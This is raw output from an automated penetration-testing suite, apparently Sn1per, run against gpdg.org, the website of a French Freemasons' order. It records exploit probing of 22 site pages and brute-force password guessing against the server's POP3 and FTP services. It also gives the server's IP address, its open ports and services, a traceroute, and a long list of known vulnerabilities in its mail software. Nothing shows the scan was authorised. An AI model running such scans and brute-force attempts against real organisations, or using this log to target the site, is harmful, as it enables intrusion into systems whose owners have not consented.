4755[ INFO ][ TOTAL FOUND VALUES ]:: [ 22 ]
4756
4757
4758 _[ - ]::--------------------------------------------------------------------------------------------------------------
4759|_[ + ] [ 0 / 22 ]-[11:56:19] [ - ]
4760|_[ + ] Target:: [ http://www.gpdg.org/ ]
4761|_[ + ] Exploit::
4762|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4763|_[ + ] More details:: / - / , ISP:
4764|_[ + ] Found:: UNIDENTIFIED
4765
4766 _[ - ]::--------------------------------------------------------------------------------------------------------------
4767|_[ + ] [ 1 / 22 ]-[11:56:21] [ - ]
4768|_[ + ] Target:: [ http://www.gpdg.org/auvergne.html ]
4769|_[ + ] Exploit::
4770|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4771|_[ + ] More details:: / - / , ISP:
4772|_[ + ] Found:: UNIDENTIFIED
4773
4774 _[ - ]::--------------------------------------------------------------------------------------------------------------
4775|_[ + ] [ 2 / 22 ]-[11:56:23] [ - ]
4776|_[ + ] Target:: [ http://www.gpdg.org/auvergne-02.html ]
4777|_[ + ] Exploit::
4778|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4779|_[ + ] More details:: / - / , ISP:
4780|_[ + ] Found:: UNIDENTIFIED
4781
4782 _[ - ]::--------------------------------------------------------------------------------------------------------------
4783|_[ + ] [ 3 / 22 ]-[11:56:24] [ - ]
4784|_[ + ] Target:: [ http://www.gpdg.org/auvergne-01.html ]
4785|_[ + ] Exploit::
4786|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4787|_[ + ] More details:: / - / , ISP:
4788|_[ + ] Found:: UNIDENTIFIED
4789
4790 _[ - ]::--------------------------------------------------------------------------------------------------------------
4791|_[ + ] [ 4 / 22 ]-[11:56:26] [ - ]
4792|_[ + ] Target:: [ http://www.gpdg.org/questions_reponses.html ]
4793|_[ + ] Exploit::
4794|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4795|_[ + ] More details:: / - / , ISP:
4796|_[ + ] Found:: UNIDENTIFIED
4797
4798 _[ - ]::--------------------------------------------------------------------------------------------------------------
4799|_[ + ] [ 5 / 22 ]-[11:56:28] [ - ]
4800|_[ + ] Target:: [ http://www.gpdg.org/publications.html ]
4801|_[ + ] Exploit::
4802|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4803|_[ + ] More details:: / - / , ISP:
4804|_[ + ] Found:: UNIDENTIFIED
4805
4806 _[ - ]::--------------------------------------------------------------------------------------------------------------
4807|_[ + ] [ 6 / 22 ]-[11:56:30] [ - ]
4808|_[ + ] Target:: [ http://www.gpdg.org/editos.html ]
4809|_[ + ] Exploit::
4810|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4811|_[ + ] More details:: / - / , ISP:
4812|_[ + ] Found:: UNIDENTIFIED
4813
4814 _[ - ]::--------------------------------------------------------------------------------------------------------------
4815|_[ + ] [ 7 / 22 ]-[11:56:33] [ - ]
4816|_[ + ] Target:: [ http://www.gpdg.org/l-historiquedeseditos.html ]
4817|_[ + ] Exploit::
4818|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4819|_[ + ] More details:: / - / , ISP:
4820|_[ + ] Found:: UNIDENTIFIED
4821
4822 _[ - ]::--------------------------------------------------------------------------------------------------------------
4823|_[ + ] [ 8 / 22 ]-[11:56:35] [ - ]
4824|_[ + ] Target:: [ http://www.gpdg.org/rite-francais.html ]
4825|_[ + ] Exploit::
4826|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4827|_[ + ] More details:: / - / , ISP:
4828|_[ + ] Found:: UNIDENTIFIED
4829
4830 _[ - ]::--------------------------------------------------------------------------------------------------------------
4831|_[ + ] [ 9 / 22 ]-[11:56:37] [ - ]
4832|_[ + ] Target:: [ http://www.gpdg.org/phone/riteecossaiserectifie.html ]
4833|_[ + ] Exploit::
4834|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4835|_[ + ] More details:: / - / , ISP:
4836|_[ + ] Found:: UNIDENTIFIED
4837
4838 _[ - ]::--------------------------------------------------------------------------------------------------------------
4839|_[ + ] [ 10 / 22 ]-[11:56:39] [ - ]
4840|_[ + ] Target:: [ http://www.gpdg.org/phone/riteecossaisdecosse.html ]
4841|_[ + ] Exploit::
4842|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4843|_[ + ] More details:: / - / , ISP:
4844|_[ + ] Found:: UNIDENTIFIED
4845
4846 _[ - ]::--------------------------------------------------------------------------------------------------------------
4847|_[ + ] [ 11 / 22 ]-[11:56:41] [ - ]
4848|_[ + ] Target:: [ http://www.gpdg.org/a-propos.html ]
4849|_[ + ] Exploit::
4850|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4851|_[ + ] More details:: / - / , ISP:
4852|_[ + ] Found:: UNIDENTIFIED
4853
4854 _[ - ]::--------------------------------------------------------------------------------------------------------------
4855|_[ + ] [ 12 / 22 ]-[11:56:43] [ - ]
4856|_[ + ] Target:: [ http://www.gpdg.org/tablet/tablette-rer.html ]
4857|_[ + ] Exploit::
4858|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4859|_[ + ] More details:: / - / , ISP:
4860|_[ + ] Found:: UNIDENTIFIED
4861
4862 _[ - ]::--------------------------------------------------------------------------------------------------------------
4863|_[ + ] [ 13 / 22 ]-[11:56:45] [ - ]
4864|_[ + ] Target:: [ http://www.gpdg.org/rite-ecossais-rectifie.html ]
4865|_[ + ] Exploit::
4866|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4867|_[ + ] More details:: / - / , ISP:
4868|_[ + ] Found:: UNIDENTIFIED
4869
4870 _[ - ]::--------------------------------------------------------------------------------------------------------------
4871|_[ + ] [ 14 / 22 ]-[11:56:48] [ - ]
4872|_[ + ] Target:: [ http://www.gpdg.org/tablet/tablette-ree.html ]
4873|_[ + ] Exploit::
4874|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4875|_[ + ] More details:: / - / , ISP:
4876|_[ + ] Found:: UNIDENTIFIED
4877
4878 _[ - ]::--------------------------------------------------------------------------------------------------------------
4879|_[ + ] [ 15 / 22 ]-[11:56:50] [ - ]
4880|_[ + ] Target:: [ http://www.gpdg.org/rite-d-ecosse.html ]
4881|_[ + ] Exploit::
4882|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4883|_[ + ] More details:: / - / , ISP:
4884|_[ + ] Found:: UNIDENTIFIED
4885
4886 _[ - ]::--------------------------------------------------------------------------------------------------------------
4887|_[ + ] [ 16 / 22 ]-[11:56:52] [ - ]
4888|_[ + ] Target:: [ http://www.gpdg.org/tablet/tablette-rf.html ]
4889|_[ + ] Exploit::
4890|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4891|_[ + ] More details:: / - / , ISP:
4892|_[ + ] Found:: UNIDENTIFIED
4893
4894 _[ - ]::--------------------------------------------------------------------------------------------------------------
4895|_[ + ] [ 17 / 22 ]-[11:56:54] [ - ]
4896|_[ + ] Target:: [ http://www.gpdg.org/informations-en-anglais.html ]
4897|_[ + ] Exploit::
4898|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4899|_[ + ] More details:: / - / , ISP:
4900|_[ + ] Found:: UNIDENTIFIED
4901
4902 _[ - ]::--------------------------------------------------------------------------------------------------------------
4903|_[ + ] [ 18 / 22 ]-[11:56:56] [ - ]
4904|_[ + ] Target:: [ http://www.gpdg.org/tablet/question-reponses.html ]
4905|_[ + ] Exploit::
4906|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4907|_[ + ] More details:: / - / , ISP:
4908|_[ + ] Found:: UNIDENTIFIED
4909
4910 _[ - ]::--------------------------------------------------------------------------------------------------------------
4911|_[ + ] [ 19 / 22 ]-[11:57:00] [ - ]
4912|_[ + ] Target:: [ http://www.gpdg.org/phone/historiques-des-articles.html ]
4913|_[ + ] Exploit::
4914|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4915|_[ + ] More details:: / - / , ISP:
4916|_[ + ] Found:: UNIDENTIFIED
4917
4918 _[ - ]::--------------------------------------------------------------------------------------------------------------
4919|_[ + ] [ 20 / 22 ]-[11:57:04] [ - ]
4920|_[ + ] Target:: [ http://www.gpdg.org/tablet/historique-des-articles.html ]
4921|_[ + ] Exploit::
4922|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4923|_[ + ] More details:: / - / , ISP:
4924|_[ + ] Found:: UNIDENTIFIED
4925
4926 _[ - ]::--------------------------------------------------------------------------------------------------------------
4927|_[ + ] [ 21 / 22 ]-[11:57:06] [ - ]
4928|_[ + ] Target:: [ http://www.gpdg.org/phone/questions-et-reponses.html ]
4929|_[ + ] Exploit::
4930|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PleskLin, IP:92.39.247.11:80
4931|_[ + ] More details:: / - / , ISP:
4932|_[ + ] Found:: UNIDENTIFIED
4933
4934[ INFO ] [ Shutting down ]
4935[ INFO ] [ End of process INURLBR at [25-11-2019 11:57:06]
4936[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
4937[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.gpdg.org/output/inurlbr-www.gpdg.org ]
4938|_________________________________________________________________________________________
4939
4940\_________________________________________________________________________________________/
4941#######################################################################################################################################
4942Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 11:57 EST
4943Nmap scan report for www.gpdg.org (92.39.247.11)
4944Host is up (0.18s latency).
4945rDNS record for 92.39.247.11: vps2330-cloud.sd-france.net
4946
4947PORT STATE SERVICE VERSION
4948110/tcp open pop3 Courier pop3d
4949| pop3-brute:
4950| Accounts: No valid accounts found
4951| Statistics: Performed 12 guesses in 12 seconds, average tps: 1.0
4952|_ ERROR: Failed to connect.
4953|_pop3-capabilities: UIDL PIPELINING APOP STLS USER TOP IMPLEMENTATION(Courier Mail Server) LOGIN-DELAY(10) SASL(LOGIN CRAM-MD5 CRAM-SHA1 CRAM-SHA256 PLAIN)
4954| vulscan: VulDB - https://vuldb.com:
4955| [100906] Accellion FTA WAF Filter courier/1000@/index.html cross site scripting
4956| [11638] Courier MTA Webmail Server 0.73 External File System denial of service
4957| [50729] e-Courier CMS wizard_oe2.asp Wizard_tracking.asp cross site scripting
4958| [50725] e-Courier CMS cross site scripting
4959| [46287] Pre Courier and Cargo Business unknown vulnerability
4960| [45619] Courier-mta Courtier-authlib up to 0.61.1 authpgsqllib.c sql injection
4961| [36320] Double Precision Incorporated courier-imap up to 4.1.1 Login privilege escalation
4962|
4963| MITRE CVE - https://cve.mitre.org:
4964| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
4965| [CVE-2010-1328] Multiple cross-site scripting (XSS) vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) tipo or (2) destino parameter to login_registrese.php3 in the Services section, (3) the rubro parameter to precios.php3 in the Products section, (4) the arti parameter to recomenda_articulo.php3 in the Products section, (5) the descrip parameter in a profile action to control/abm_det.php3 in the e-Commerce section, (6) the tit parameter in a delivery_courier action to control/abm_list.php3 in the e-Commerce section, or (7) the tit parameter in an usuario action to control/abm_det.php3 in the e-Commerce section.
4966| [CVE-2010-1327] Multiple SQL injection vulnerabilities in TornadoStore 1.4.3 and earlier allow remote attackers to execute arbitrary SQL commands via (1) the marca parameter to precios.php3 or (2) the where parameter in a delivery_courier action to control/abm_list.php3.
4967| [CVE-2009-3905] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to (1) Wizard_tracking.asp, (2) wizard_oe2.asp, (3) your-register.asp, (4) main-whyregister.asp, and (5) your.asp in home/, and other unspecified vectors. NOTE: the provenance of this information is unknown
4968| [CVE-2009-3901] Multiple cross-site scripting (XSS) vulnerabilities in e-Courier CMS allow remote attackers to inject arbitrary web script or HTML via the UserGUID parameter to home/index.asp and other unspecified vectors.
4969| [CVE-2008-7012] courier/1000@/api_error_email.html (aka "error reporting page") in Accellion File Transfer Appliance FTA_7_0_178, and possibly other versions before FTA_7_0_189, allows remote attackers to send spam e-mail via modified description and client_email parameters.
4970| [CVE-2008-6984] Plesk 8.6.0, when short mail login names (SHORTNAMES) are enabled, allows remote attackers to bypass authentication and send spam e-mail via a message with (1) a base64-encoded username that begins with a valid shortname, or (2) a username that matches a valid password, as demonstrated using (a) SMTP and qmail, and (b) Courier IMAP and POP3.
4971| [CVE-2008-6054] PreProjects Pre Courier and Cargo Business stores dbcourior.mdb under the web root with insufficient access control, which allows remote attackers to obtain passwords via a direct request.
4972| [CVE-2008-3850] Cross-site scripting (XSS) vulnerability in Accellion File Transfer FTA_7_0_135 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to courier/forgot_password.html.
4973| [CVE-2008-2667] SQL injection vulnerability in the Courier Authentication Library (aka courier-authlib) before 0.60.6 on SUSE openSUSE 10.3 and 11.0, and other platforms, when MySQL and a non-Latin character set are used, allows remote attackers to execute arbitrary SQL commands via the username and unspecified other vectors.
4974| [CVE-2008-2380] SQL injection vulnerability in authpgsqllib.c in Courier-Authlib before 0.62.0, when a non-Latin locale Postgres database is used, allows remote attackers to execute arbitrary SQL commands via query parameters containing apostrophes.
4975| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
4976| [CVE-2006-6390] Multiple directory traversal vulnerabilities in Open Solution Quick.Cart 2.0, when register_globals is enabled and magic_quotes_gpc is disabled, allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the config[db_type] parameter to (1) categories.php, (2) couriers.php, (3) orders.php, and (4) products.php in actions_admin/
4977| [CVE-2006-2659] libs/comverp.c in Courier MTA before 0.53.2 allows attackers to cause a denial of service (CPU consumption) via unknown vectors involving usernames that contain the "=" (equals) character, which is not properly handled during encoding.
4978| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
4979| [CVE-2005-3532] authpam.c in courier-authdaemon for Courier Mail Server 0.37.3 through 0.52.1, when using pam_tally, does not call the pam_acct_mgmt function to verify that access should be granted, which allows attackers to authenticate to the server using accounts that have been disabled.
4980| [CVE-2005-2151] spf.c in Courier Mail Server does not properly handle DNS failures when looking up Sender Policy Framework (SPF) records, which could allow attackers to cause memory corruption.
4981| [CVE-2004-0777] Format string vulnerability in the auth_debug function in Courier-IMAP 1.6.0 through 2.2.1 and 3.x through 3.0.3, when login debugging (DEBUG_LOGIN) is enabled, allows remote attackers to execute arbitrary code.
4982| [CVE-2004-0224] Multiple buffer overflows in (1) iso2022jp.c or (2) shiftjis.c for Courier-IMAP before 3.0.0, Courier before 0.45, and SqWebMail before 4.0.0 may allow remote attackers to execute arbitrary code "when Unicode character is out of BMP range."
4983| [CVE-2003-0040] SQL injection vulnerability in the PostgreSQL auth module for courier 0.40 and earlier allows remote attackers to execute SQL code via the user name.
4984| [CVE-2002-1311] Courier sqwebmail before 0.40.0 does not quickly drop privileges after startup in certain cases, which could allow local users to read arbitrary files.
4985| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
4986| [CVE-2002-0914] Double Precision Courier e-mail MTA allows remote attackers to cause a denial of service (CPU consumption) via a message with an extremely large or negative value for the year, which causes a tight loop.
4987| [CVE-2002-0436] sscd_suncourier.pl CGI script in the Sun Sunsolve CD pack allows remote attackers to execute arbitrary commands via shell metacharacters in the email address parameter.
4988| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
4989| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
4990| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
4991|
4992| SecurityFocus - https://www.securityfocus.com/bid/:
4993| [84605] Pre Courier And Cargo Business CVE-2008-6054 Remote Security Vulnerability
4994| [75469] Courier Mail Server Multiple Memory Corruption Vulnerabilities
4995| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
4996| [41970] e-Courier CMS 'UserGUID' Parameter Multiple Cross Site Scripting Vulnerabilities
4997| [39838] tpop3d Remote Denial of Service Vulnerability
4998| [32926] Courier-Authlib Non-Latin Character Handling Postgres SQL Injection Vulnerability
4999| [29605] Courier-Authlib Non-Latin Character Handling SQL Injection Vulnerability
5000| [23589] Courier-IMAP XMAILDIR Shell Command Injection Vulnerability
5001| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
5002| [18345] Courier Mail Server Username Encoding Remote Denial Of Service Vulnerability
5003| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
5004| [15771] Courier Mail Server Unauthorized Access Vulnerability
5005| [14135] Courier Mail Server Remote Denial Of Service Vulnerability
5006| [10976] Courier-IMAP Remote Format String Vulnerability
5007| [9845] Courier Multiple Remote Buffer Overflow Vulnerabilities
5008| [8495] akpop3d User Name SQL Injection Vulnerability
5009| [8473] Vpop3d Remote Denial Of Service Vulnerability
5010| [6738] Courier-IMAP Username SQL Injection Vulnerability
5011| [6189] Courier SqWebMail File Disclosure Vulnerability
5012| [4908] Courier MTA Long Year Remote Resource Consumption Vulnerability
5013| [4269] Sun Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability
5014| [3990] ZPop3D Bad Login Logging Failure Vulnerability
5015| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
5016|
5017| IBM X-Force - https://exchange.xforce.ibmcloud.com:
5018| [54180] e-Courier CMS multiple scripts cross-site scripting
5019| [54143] e-Courier CMS index.asp cross-site scripting
5020| [47494] Courier Authentication Library Postgres SQL injection
5021| [47436] PRE COURIER &
5022| [43628] Novell OpenSUSE courier-authlib SQL injection
5023| [42950] Courier authentication library username SQL injection
5024| [33805] Gentoo Courier-IMAP command execution
5025| [26998] Courier Mail Server libs/comverp.c usernames denial of service
5026| [26578] Cyrus IMAP pop3d buffer overflow
5027| [23532] Courier Mail Server authentication daemon allows deactivated account access
5028| [21565] Courier Mail Server rfc1035/spf.c denial of service
5029| [17034] Courier-IMAP auth_debug format string attack
5030| [15434] Courier Japanese codeset converter buffer overflow
5031| [13018] akpop3d authentication code SQL injection
5032| [11213] Courier-IMAP authpgsqllib username SQL injection
5033| [10643] Courier sqwebmail mail transport agent (MTA) fails to properly enforce permissions
5034| [9228] Courier MTA long year denial of service
5035| [7345] Slackware Linux imapd and ipop3d core dump
5036| [6269] imap, ipop2d and ipop3d buffer overflows
5037| [5923] Linuxconf vpop3d symbolic link
5038| [4918] IPOP3D, Buffer overflow attack
5039| [1560] IPOP3D, user login successful
5040| [1559] IPOP3D user login to remote host successful
5041| [1525] IPOP3D, user logout
5042| [1524] IPOP3D, user auto-logout
5043| [1523] IPOP3D, user login failure
5044| [1522] IPOP3D, brute force attack
5045| [1521] IPOP3D, user kiss of death logout
5046| [418] pop3d mktemp creates insecure temporary files
5047|
5048| Exploit-DB - https://www.exploit-db.com:
5049| [23053] Vpop3d Remote Denial of Service Vulnerability
5050| [21340] Solaris 7.0/8 Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution Vulnerability
5051| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
5052| [11893] tPop3d 1.5.3 DoS
5053| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
5054| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
5055| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
5056| [432] Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit
5057|
5058| OpenVAS (Nessus) - http://www.openvas.org:
5059| [63556] Gentoo Security Advisory GLSA 200903-25 (courier-authlib)
5060| [63063] Debian Security Advisory DSA 1688-2 (courier-authlib)
5061| [63031] Debian Security Advisory DSA 1688-1 (courier-authlib)
5062| [61600] Gentoo Security Advisory GLSA 200809-05 (courier-authlib)
5063| [61192] FreeBSD Ports: courier-authlib
5064| [58224] Gentoo Security Advisory GLSA 200704-18 (courier-imap)
5065| [57856] Gentoo Security Advisory GLSA 200608-06 (Courier)
5066| [57001] Debian Security Advisory DSA 1101-1 (courier)
5067| [55972] Debian Security Advisory DSA 917-1 (courier)
5068| [55421] Debian Security Advisory DSA 820-1 (courier)
5069| [55204] Debian Security Advisory DSA 793-1 (courier)
5070| [55165] Debian Security Advisory DSA 784-1 (courier)
5071| [54649] Gentoo Security Advisory GLSA 200408-19 (courier-imap)
5072| [54632] Gentoo Security Advisory GLSA 200408-02 (Courier)
5073| [54531] Gentoo Security Advisory GLSA 200403-06 (Courier)
5074| [53589] Debian Security Advisory DSA 247-1 (courier)
5075| [53441] Debian Security Advisory DSA 197-1 (courier)
5076| [53222] Debian Security Advisory DSA 533-1 (courier)
5077| [52431] FreeBSD Ports: courier
5078| [52418] FreeBSD Ports: courier-imap
5079|
5080| SecurityTracker - https://www.securitytracker.com:
5081| [1016248] Courier Mailing List Manager Lets Remote Users Deny Service
5082| [1014798] Courier Mail Server Error in Processing SPF Responses May Let Remote Users Deny Service
5083| [1010982] Courier-IMAP Format String Flaw in auth_debug() Lets Remote Users Execute Arbitrary Code
5084| [1009455] Courier Mail Server 'iso2022jp' and 'shiftjis' Buffer Overflows May Let Remote Users Execute Arbitrary Code
5085| [1006101] Courier Mail Transfer Agent May Let Remote Users Inject and Execute SQL Statements
5086| [1005639] Courier SqWebMail Privilege Dropping Bug Lets Local Users View Files on the System
5087| [1004433] Courier Mail Server Input Validation Bug Lets Remote Users Send Mail Containing Bogus Dates to Cause the Server to Consume Available CPU Resources
5088|
5089| OSVDB - http://www.osvdb.org:
5090| [86050] Courier Authentication Library (courier-authlib) Multiple Unspecified Issues
5091| [63879] Courier MTA localmailfilter Error Message Handling Remote DoS
5092| [59669] e-Courier CMS home/your.asp UserGUID Parameter XSS
5093| [59668] e-Courier CMS home/main-whyregister.asp UserGUID Parameter XSS
5094| [59667] e-Courier CMS home/your-register.asp UserGUID Parameter XSS
5095| [59666] e-Courier CMS home/wizard_oe2.asp UserGUID Parameter XSS
5096| [59665] e-Courier CMS home/Wizard_tracking.asp UserGUID Parameter XSS
5097| [59662] e-Courier CMS home/index.asp UserGUID Parameter XSS
5098| [50872] Pre Courier and Cargo Business dbcourior.mdb Direct Request Database Disclosure
5099| [50811] Courier Authentication Library authpgsqllib.c Unspecified SQL Injection
5100| [48242] Accellion File Transfer Appliance courier/1000@/api_error_email.html Arbitrary Mail Relay
5101| [47516] openSUSE courier-authlib Unspecified SQL Injection
5102| [46049] Courier Authentication Library Username SQL Injection
5103| [35274] Gentoo courier-imap XMAILDIR Variable Remote Command Injection
5104| [31746] Quick.Cart couriers.php config[db_type] Parameter Traversal Local File Inclusion
5105| [26232] Courier Mail Server Crafted Username Encoding DoS
5106| [25853] Cyrus IMAPD pop3d USER Command Remote Overflow
5107| [21541] Courier Mail Server courier-authdaemon Deactivated Account Authentication Bypass
5108| [17718] Courier Mail Server DNS SPF Record Lookup Failure Memory Corruption DoS
5109| [14521] Courier sqwebmail Startup Sequence Arbitrary File Access
5110| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
5111| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
5112| [10598] Sun Sunsolve CD Pack sscd_suncourier.pl email Parameter Arbitrary Command Execution
5113| [9506] PostgreSQL Auth Module For Courier User Name Parameter SQL Injection
5114| [9013] Courier-IMAP debug.c auth_debug() Function Remote Format String
5115| [6927] Courier Japanese Codeset shiftjis.c Conversion Overflow
5116| [5857] Linux pop3d Arbitrary Mail File Access
5117| [5052] Double Precision Courier MTA Invalid Year DoS
5118| [4194] Courier Japanese Codeset iso2022jp.c Conversion Overflow
5119| [2471] akpop3d username SQL Injection
5120|_
5121Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
5122Device type: general purpose
5123Running (JUST GUESSING): Linux 3.X|4.X (88%)
5124OS CPE: cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.0
5125Aggressive OS guesses: Linux 3.10 (88%), Linux 4.0 (88%), Linux 4.4 (87%), Linux 4.9 (87%), Linux 3.10 - 3.16 (86%), Linux 3.10 - 3.12 (86%)
5126No exact OS matches for host (test conditions non-ideal).
5127Network Distance: 14 hops
5128Service Info: Host: localhost.localdomain
5129
5130TRACEROUTE (using port 110/tcp)
5131HOP RTT ADDRESS
51321 127.33 ms 10.245.200.1
51332 ...
51343 128.20 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
51354 128.17 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
51365 133.38 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
51376 151.99 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
51387 157.39 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
51398 157.39 ms be2434.agr21.ams03.atlas.cogentco.com (130.117.2.241)
51409 157.38 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
514110 167.45 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
514211 193.78 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
514312 180.69 ms 62.100.128.107
514413 185.92 ms 62.100.128.115
514514 179.32 ms vps2330-cloud.sd-france.net (92.39.247.11)
5146#######################################################################################################################################
5147https://www.gpdg.org [200 OK] Country[FRANCE][FR], HTML5, HTTPServer[nginx], IP[92.39.247.11], JQuery[1.8.3], MetaGenerator[2018.1.0.386], Plesk[Lin], Script[JavaScript>,text/javascript], Title[Bienvenue sur le portail du Grand Prieuré des Gaules - Ordre des Francs-Maçons Chrétiens de France], X-Powered-By[PleskLin], nginx
5148#######################################################################################################################################
5149WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
5150Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 10:39 EST
5151Nmap scan report for vps2330-cloud.sd-france.net (92.39.247.11)
5152Host is up (0.18s latency).
5153Not shown: 456 filtered ports, 28 closed ports
5154Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
5155PORT STATE SERVICE
515621/tcp open ftp
515722/tcp open ssh
515853/tcp open domain
515980/tcp open http
5160110/tcp open pop3
5161143/tcp open imap
5162443/tcp open https
5163465/tcp open smtps
5164993/tcp open imaps
5165995/tcp open pop3s
51668443/tcp open https-alt
51678880/tcp open cddbp-alt
5168
5169Nmap done: 1 IP address (1 host up) scanned in 5.16 seconds
5170#######################################################################################################################################
5171Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 10:39 EST
5172Nmap scan report for vps2330-cloud.sd-france.net (92.39.247.11)
5173Host is up (0.17s latency).
5174Not shown: 2 filtered ports
5175PORT STATE SERVICE
517653/udp open domain
517767/udp open|filtered dhcps
517868/udp open|filtered dhcpc
517969/udp open|filtered tftp
518088/udp open|filtered kerberos-sec
5181123/udp open|filtered ntp
5182139/udp open|filtered netbios-ssn
5183161/udp open|filtered snmp
5184162/udp open|filtered snmptrap
5185389/udp open|filtered ldap
5186500/udp open|filtered isakmp
5187520/udp open|filtered route
51882049/udp open|filtered nfs
5189
5190Nmap done: 1 IP address (1 host up) scanned in 4.08 seconds
5191#######################################################################################################################################
5192Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 10:39 EST
5193NSE: [ftp-brute] usernames: Time limit 10m00s exceeded.
5194NSE: [ftp-brute] usernames: Time limit 10m00s exceeded.
5195NSE: [ftp-brute] passwords: Time limit 10m00s exceeded.
5196Nmap scan report for vps2330-cloud.sd-france.net (92.39.247.11)
5197Host is up (0.18s latency).
